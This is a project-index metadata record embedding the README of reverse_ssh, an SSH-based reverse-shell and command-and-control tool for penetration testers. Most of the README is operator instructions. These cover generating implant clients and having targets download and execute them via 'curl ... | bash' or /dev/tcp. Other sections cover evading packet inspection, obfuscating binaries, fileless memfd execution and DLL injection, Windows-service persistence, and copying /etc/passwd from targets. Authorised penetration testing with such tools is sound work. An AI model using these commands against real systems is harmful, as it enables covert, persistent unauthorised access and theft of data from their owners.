{"id":13575373,"url":"https://github.com/NHAS/reverse_ssh","last_synced_at":"2025-04-04T22:30:51.875Z","repository":{"id":38397774,"uuid":"337936474","full_name":"NHAS/reverse_ssh","owner":"NHAS","description":"SSH based reverse shell ","archived":false,"fork":false,"pushed_at":"2024-04-13T06:17:07.000Z","size":4868,"stargazers_count":815,"open_issues_count":2,"forks_count":114,"subscribers_count":24,"default_branch":"main","last_synced_at":"2024-04-13T22:05:22.574Z","etag":null,"topics":["golang","hacking","pentest","pentesting","proxy","reverse-shell","scp","sftp","shell","ssh","static-binary","tunnel"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NHAS.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"ko_fi":"nhasmakesthings"}},"created_at":"2021-02-11T05:15:56.000Z","updated_at":"2024-04-16T09:26:37.171Z","dependencies_parsed_at":"2023-01-31T10:30:54.005Z","dependency_job_id":"d37a0cac-b23b-443b-a453-4fa5de2fa202","html_url":"https://github.com/NHAS/reverse_ssh","commit_stats":null,"previous_names":[],"tags_count":53,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/manifests","owner_url":"https://repos.eco
syste.ms/api/v1/hosts/GitHub/owners/NHAS","download_url":"https://codeload.github.com/NHAS/reverse_ssh/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246989745,"owners_count":20865331,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","hacking","pentest","pentesting","proxy","reverse-shell","scp","sftp","shell","ssh","static-binary","tunnel"],"created_at":"2024-08-01T15:01:00.418Z","updated_at":"2025-04-04T22:30:51.868Z","avatar_url":"https://github.com/NHAS.png","language":"Go","funding_links":["https://ko-fi.com/nhasmakesthings"],"categories":["Go"],"sub_categories":[],"readme":"# Reverse SSH\n![icon](icons/On_Top_Of_Fv.png)  \n(Art credit to https://www.instagram.com/smart.hedgehog.art/)\n\nWant to use SSH for reverse shells? 
Now you can.\n\n- Manage and connect to reverse shells with native SSH syntax\n- Dynamic, local and remote forwarding\n- Native `SCP` and `SFTP` implementations for retrieving files from your targets\n- Full windows shell\n- Multiple network transports, such as `http`, `websockets`, `tls` and more\n- Mutual client \u0026 server authentication to create high trust control channels\nAnd more!\n\n\n```text\n                    +----------------+                 +---------+\n                    |                |                 |         |\n                    |                |       +---------+   RSSH  |\n                    |    Reverse     |       |         |  Client |\n                    |  SSH server    |       |         |         |\n                    |                |       |         +---------+\n+---------+         |                |       |\n|         |         |                |       |\n| Human   |   SSH   |                |  SSH  |         +---------+\n| Client  +--------\u003e+                \u003c-----------------+         |\n|         |         |                |       |         |   RSSH  |\n+---------+         |                |       |         |  Client |\n                    |                |       |         |         |\n                    |                |       |         +---------+\n                    |                |       |\n                    |                |       |\n                    +----------------+       |         +---------+\n                                             |         |         |\n                                             |         |   RSSH  |\n                                             +---------+  Client |\n                                                       |         |\n                                                       +---------+\n```\n\n\n\nhttps://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1\n\n\n- [Reverse SSH](#reverse-ssh)\n  - [TL;DR](#tldr)\n    - 
[Setup](#setup)\n    - [Basic Usage](#basic-usage)\n  - [Sponsors](#sponsors)\n    - [Individuals](#individuals)\n    - [Companies](#companies)\n  - [Fancy Features](#fancy-features)\n    - [Privileges](#privileges)\n    - [Automatic connect-back](#automatic-connect-back)\n    - [Reverse shell download (client generation and in-built HTTP server)](#reverse-shell-download-client-generation-and-in-built-http-server)\n    - [Alternate Transports (HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)\n    - [Bash autocomplete](#bash-autocomplete)\n    - [Windows DLL Generation](#windows-dll-generation)\n    - [SSH Subsystems](#ssh-subsystems)\n      - [All](#all)\n      - [Linux](#linux)\n      - [Windows](#windows)\n    - [Windows Service Integration](#windows-service-integration)\n    - [Full Windows Shell Support](#full-windows-shell-support)\n    - [Webhooks](#webhooks)\n    - [Tun (VPN)](#tun-vpn)\n    - [Fileless execution (Clients support dynamically downloading executables to execute as shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)\n      - [Supported URI Schemes](#supported-uri-schemes)\n- [Help](#help)\n  - [Windows and SFTP](#windows-and-sftp)\n  - [Server started with `--insecure` still has `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)\n  - [Foreground vs Background](#foreground-vs-background)\n- [Donations, Support, or Giving Back](#donations-support-or-giving-back)\n\n## TL;DR\n\n### Setup\n\nThe docker release is recommended as it includes the right version of golang, and a cross compiler for windows.\n```sh\n# Start the server\ndocker run -p3232:2222 -e EXTERNAL_ADDRESS=\u003cyour.rssh.server.internal\u003e:3232 -e SEED_AUTHORIZED_KEYS=\"$(cat ~/.ssh/id_ed25519.pub)\" -v ./data:/data reversessh/reverse_ssh\n```\n\nor docker compose:\n\n```yaml\nservices:\n  reversessh:\n    image: reversessh/reverse_ssh\n    ports:\n      - \"3232:2222\"\n    
environment:\n      - EXTERNAL_ADDRESS=\u003cyour.rssh.server.internal\u003e:3232\n      - RSSH_CONSOLE_LABEL=c2.label\n      - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL\n      - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY}\n    volumes:\n      - ./data:/data\n```\n\n### Basic Usage\n\n```sh\n# Connect to the server console\nssh your.rssh.server.internal -p 3232\n\n\n# List all server console commands\ncatcher$ help\n\n# Build a new client and host it on the in-built webserver\ncatcher$ link\nhttp://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25\n\n\n# curl or wget this binary to a target system then execute it,\ncurl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash\n\n# then we can then list what clients are connected\ncatcher$ ls\n                                 Targets\n+------------------------------------------+-----------------------------------+\n| IDs                                      | Version                           |\n+------------------------------------------+-----------------------------------+\n| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |\n| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |\n| dummy.machine                            |                                   |\n| 192.168.0.11:34542                       |                                   |\n+------------------------------------------+-----------------------------------+\n```\n\nAll commands support the `-h` flag for giving help.\n\n\nThen typical ssh commands work, just specify your rssh server as a jump host.\n\n```sh\n# Connect to full shell\nssh -J your.rssh.server.internal:3232 dummy.machine\n\n# Start remote forward\nssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine\n\n# Start dynamic forward\nssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine\n\n# SCP\nscp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .\n\n```\n\n## Sponsors \n\nA 
huge thanks to the following folk for donating to the RSSH project and making all this work possible! \n\n### Individuals\n[chikamobina](https://github.com/chikamobina) for their generous donations!  \n[wrighterase (ctrlzero)](https://github.com/wrighterase) for their pull requests and donation! \n\n### Companies\n\n[Carapace](https://carapace.nz/) is a New Zealand based security consultancy with an extremely talented team of folk!  \n[\u003cimg src=\"icons/carapace_logo.png\"\u003e](https://carapace.nz/)\n\n\n## Fancy Features\n\n\n### Privileges\nThe RSSH server supports very basic user privileges, where users found in the `data-directory`/`keys` (specified by `--datadir`) folder, e.g. `data-directory/keys/jim`, will be assigned as a \"user\" only able to see clients that are public (found in the authorized_controllee_keys file without an `owners` tag, or an empty `owners` tag) or specifically assigned to them, e.g. `owners=\"jim\"`. \n\nThis can be changed at run time by a user sharing access to a client they own with the `access` command, or by a server administrator. By default, any public key found in the `authorized_keys` file will be marked as an administrator to retain backwards compatibility.\nAny changes made by the `access` command will not persist across a server reboot; making them permanent requires editing the `authorized_controllee_keys` file for that specific client. 
\n\n### Automatic connect-back\n\nThe rssh client allows you to bake in a connect-back address.\nBy default the `link` command will bake in the server's external address.\n\nIf you're (for some reason) manually building the binary, you can specify the environment variable `RSSH_HOMESERVER` to bake it into the client:\n\n```sh\n$ RSSH_HOMESERVER=your.rssh.server.internal:3232 make\n\n# Will connect to your.rssh.server.internal:3232, even though no destination is specified\n$ bin/client\n\n# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232\n$ bin/client -d example.com:3232\n```\n\n### Reverse shell download (client generation and in-built HTTP/Raw TCP server)\n\nThe RSSH server can build and host client binaries (`link` command), which is the preferred method for building and serving clients.\nFor this to work the server must be placed in the project `bin/` folder, as it needs to find the client source.\n\nBy default the `docker` release has this all built properly, and is recommended for use.\n\n```sh\nssh your.rssh.server.internal -p 3232\n\ncatcher$ link -h\n\nlink [OPTIONS]\nLink will compile a client and serve the resulting binary on a link which is returned.\nThis requires the web server component has been enabled.\n        --fingerprint   Set RSSH server fingerprint will default to server public key\n        --garble        Use garble to obfuscate the binary (requires garble to be installed)\n        --goarch        Set the target build architecture (default runtime GOARCH)\n        --goarm Set the go arm variable (not set by default)\n        --goos  Set the target build operating system (default runtime GOOS)\n        --http  Use http polling as the underlying transport\n        --https Use https polling as the underlying transport\n        --log-level     Set default output logging levels, [INFO,WARNING,ERROR,FATAL,DISABLED]\n        --lzma  Use lzma compression for smaller binary at the cost of overhead at execution 
(requires upx flag to be set)\n        --name  Set the link download url/filename (default random characters)\n        --no-lib-c      Compile client without glibc\n        --ntlm-proxy-creds      Set NTLM proxy credentials in format DOMAIN\\\\USER:PASS\n        --owners        Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson\n        --proxy Set connect proxy address to bake it\n        --raw-download  Download over raw TCP, outputs bash downloader rather than http\n        --shared-object Generate shared object file\n        --sni   When TLS is in use, set a custom SNI for the client to connect with\n        --stdio Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored\n        --tls   Use TLS as the underlying transport\n        --upx   Use upx to compress the final binary (requires upx to be installed)\n        --use-kerberos  Instruct client to try and use kerberos ticket when using a proxy\n        --working-directory     Set download/working directory for automatic script (i.e doing curl https://\u003curl\u003e.sh)\n        --ws    Use plain http websockets as the underlying transport\n        --wss   Use TLS websockets as the underlying transport\n        -C      Comment to add as the public key (acts as the name)\n        -l      List currently active download links\n        -o      Set owners of client, if unset client is public all users. 
E.g --owners jsmith,ldavidson\n        -r      Remove download link\n        -s      Set homeserver address, defaults to server --external_address if set, or server listen address if not\n\n# Generate a client and serve it on a named link\ncatcher$ link --name test\nhttp://your.rssh.server.internal:3232/test\n\n```\n\nThen you can download it as follows:\n\n```sh\nwget http://your.rssh.server.internal:3232/test\nchmod +x test\n./test\n```\n\nOr you can use raw TCP to download the client binary:\n```sh\nbash -c \"exec 3\u003c\u003e/dev/tcp/your.rssh.server.internal/3232; echo RAWtest\u003e\u00263; cat \u003c\u00263\" \u003e test\n```\nThe format for this is just `RAW` followed by the filename, i.e. in this case `test`; rssh can autogenerate this for you with `--raw-download`.\n\nThe RSSH server also supports `.sh`, `.py` and `.ps1` URL path endings, which will generate a script you can pipe into an interpreter:\n```sh\ncurl http://your.rssh.server.internal:3232/test.sh | sh\n```\n\n### Alternate Transports (HTTP/Websockets/TLS)\nThe reverse SSH server and client both support multiple transports for when deep packet inspection blocks SSH outbound from a host or network. \nYou can either specify the connect-back scheme manually, by giving it as a URL in the client. \n\nE.g\n```sh\n./client -d ws://your.rssh.server:3232\n```\n\nOr by baking it in with the `link` command. \n```sh\nssh your.rssh.server -p 3232 link --ws --name test\n```\n\n### Bash autocomplete\n\nThe RSSH server has the `autocomplete` command which integrates nicely with bash so that you can have autocompletions when not using the server console. 
\nTo install them you simply do:\n\n```sh\nssh your.rssh.server.internal -p 3232 autocomplete --shell-completion your.rssh.server.internal:3232\n```\n\nAnd this will return an autocompletion that can be added to your `.zshrc` or `.bashrc`\n\nE.g\n\n```sh\n_RSSHCLIENTSCOMPLETION()\n{\n    local cur=${COMP_WORDS[COMP_CWORD]}\n    COMPREPLY=( $(compgen -W \"$(ssh your.rssh.server.internal -p 3232 autocomplete --clients)\" -- $cur) )\n}\n\n_RSSHFUNCTIONSCOMPLETIONS()\n{\n    local cur=${COMP_WORDS[COMP_CWORD]}\n    COMPREPLY=( $(compgen -W \"$(ssh your.rssh.server.internal -p 3232 help -l)\" -- $cur) )\n}\n\ncomplete -F _RSSHFUNCTIONSCOMPLETIONS ssh your.rssh.server.internal -p 3232 \n\ncomplete -F _RSSHCLIENTSCOMPLETION ssh -J your.rssh.server.internal:3232\n\ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 exec \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 connect \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 listen -c \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 kill \n```\n\nEnabling you to do completions straight from your terminal:\n\n```sh\n# Will give you an option based on what clients are connected\nssh -J your.rssh.server.internal:3232 \u003cTAB\u003e\n```\n\n### Windows DLL Generation\n\nYou can compile the client as a DLL to be loaded with something like [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). 
This is useful when you want to do fileless injection of the rssh client.\n\nThis needs a cross compiler if you are building on Linux; use `mingw-w64-gcc`, which is included in the docker release.\n\n```bash\n# Using the link command\ncatcher$ link --goos windows --shared-object --name windows_dll\nhttp://your.rssh.server.internal:3232/windows_dll\n\n# If building manually\nCC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll\n\n```\n\n### SSH Subsystems\n\nThe SSH protocol supports calling subsystems with the `-s` flag. In RSSH this is repurposed to provide special commands for platforms, and `sftp` support.\n\n\n#### All\n`list`: Lists available subsystems\n`sftp`: Runs the sftp handler to transfer files\n\n#### Linux\n`setgid`:   Attempt to change group\n`setuid`:   Attempt to change user\n\n#### Windows\n`service`: Installs or removes the rssh binary as a windows service, requires administrative rights\n\n\ne.g\n\n```sh\n# Install the rssh binary as a service (windows only)\nssh -J your.rssh.server.internal:3232 test-pc.user.test-pc -s service --install\n```\n\n### Windows Service Integration\n\nThe client RSSH binary supports being run within a windows service and won't time out after 10 seconds. This is great for creating persistent management services.\n\n### Full Windows Shell Support\n\nMost reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of.\nThis project uses `conpty` on newer versions of windows, and the `winpty` library (which self unpacks) on older versions. 
This should mean that almost all versions of windows will net you a nice shell.\n\n### Webhooks\n\nThe RSSH server can send out raw HTTP requests, set using the `webhook` command from the terminal interface.\n\nFirst enable a webhook:\n```bash\n$ ssh your.rssh.server.internal -p 3232\ncatcher$ webhook --on http://localhost:8080/\n```\n\nThen disconnect or connect a client; this will then issue a `POST` request with the following format.\n\n\n```bash\n$ nc -l -p 8080\nPOST /rssh_webhook HTTP/1.1\nHost: localhost:8080\nUser-Agent: Go-http-client/1.1\nContent-Length: 165\nContent-Type: application/json\nAccept-Encoding: gzip\n\n{\"Status\":\"connected\",\"ID\":\"ae92b6535a30566cbae122ebb2a5e754dd58f0ca\",\"IP\":\"[::1]:52608\",\"HostName\":\"user.computer\",\"Timestamp\":\"2022-06-12T12:23:40.626775318+12:00\"}%\n```\n\n\nAs an additional note, please use the `/slack` endpoint if connecting this to discord.\n\n### Tun (VPN)\n\nRSSH and SSH support creating tuntap interfaces that allow you to route traffic and create a pseudo-VPN. It does take a bit more setup than just a local or remote forward (`-L`, `-R`), but in this mode you can send UDP and ICMP.\n\nFirst set up a tun (layer 3) device on your local machine.\n```sh\nsudo ip tuntap add dev tun0 mode tun\nsudo ip link set dev tun0 up\n\n# This will by default route all non-local network traffic through the tunnel\nsudo ip route add 0.0.0.0/0 dev tun0\n```\n\nInstall a client on a remote machine; this will not work if you have your RSSH client on the same host as your tun device.\n```sh\nssh -J your.rssh.server.internal:3232 user.wombo -w 0:any\n```\n\nThis has some limitations: it is only able to send `UDP`/`TCP`/`ICMP`, and not arbitrary layer 3 protocols. `ICMP` is best effort and may use the remote host's `ping` tool, as ICMP sockets are privileged on most machines. 
This also does not support `tap` devices, e.g. a layer 2 VPN, as this would require administrative access.\n\n### Fileless execution (Clients support dynamically downloading executables to execute as shell)\n\nWhen specifying what executable the rssh binary should run, either when connecting with a full PTY session or with raw execution, the client supports URI schemes to download off-host executables.\n\nFor example:\n\n```sh\nconnect --shell https://your.host/program \u003crssh_client_id\u003e\nssh -J your.rssh.server:3232 \u003crssh_client_id\u003e https://your.host/program\n```\n\n#### Supported URI Schemes\n\n`http/https`: Pure web downloading\n\n`rssh`: Download via the rssh server\nThe rssh server will serve content from the `downloads` directory in the executable's working directory.\n\nBoth of these methods will opportunistically use [memfd](https://man7.org/linux/man-pages/man2/memfd_create.2.html), which will not write any executables to disk.\n\n# Help\n\n## Windows and SFTP\n\nDue to the limitations of SFTP (or rather the library I'm using for it), paths need a little more effort on windows.\n\n```sh\nsftp -r -J your.rssh.server.internal:3232 test-pc.user.test-pc:'/C:/Windows/system32'\n```\n\nNote the `/` before the starting character.\n\n## Server started with `--insecure` still has `Failed to handshake`\n\nIf the client binary was generated with the `link` command, this client has the server public key fingerprint baked in by default. If you lose your server private key, the clients will no longer be able to connect.\nYou can also generate clients with `link --fingerprint \u003cfingerprint here\u003e` to specify a fingerprint; there isn't currently a way to disable this as of version 1.0.13.\n\n## Foreground vs Background\n\nBy default, clients will run in the background and the parent process will exit; the child process will be given the parent process's stdout/stderr so you will be able to see output. 
If you need to debug your client, use the `--foreground` flag.\n\n# Donations, Support, or Giving Back\n\nThe easiest way to give back to the RSSH project is by finding bugs, opening feature requests and word-of-mouth advertising it to people you think will find it useful!\n\nHowever, if you want to give something back to me directly, you can do so either through Kofi or Github Sponsors (under \"Sponsor this Project\" on the right hand side).\nOr donate to me by sending to either of the following wallets:\n\nMonero (XMR):\n`8A8TRqsBKpMMabvt5RxMhCFWcuCSZqGV5L849XQndZB4bcbgkenH8KWJUXinYbF6ySGBznLsunrd1WA8YNPiejGp3FFfPND`\nBitcoin (BTC):\n`bc1qm9e9sfrm7l7tnq982nrm6khnsfdlay07h0dxfr`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNHAS%2Freverse_ssh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNHAS%2Freverse_ssh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNHAS%2Freverse_ssh/lists"}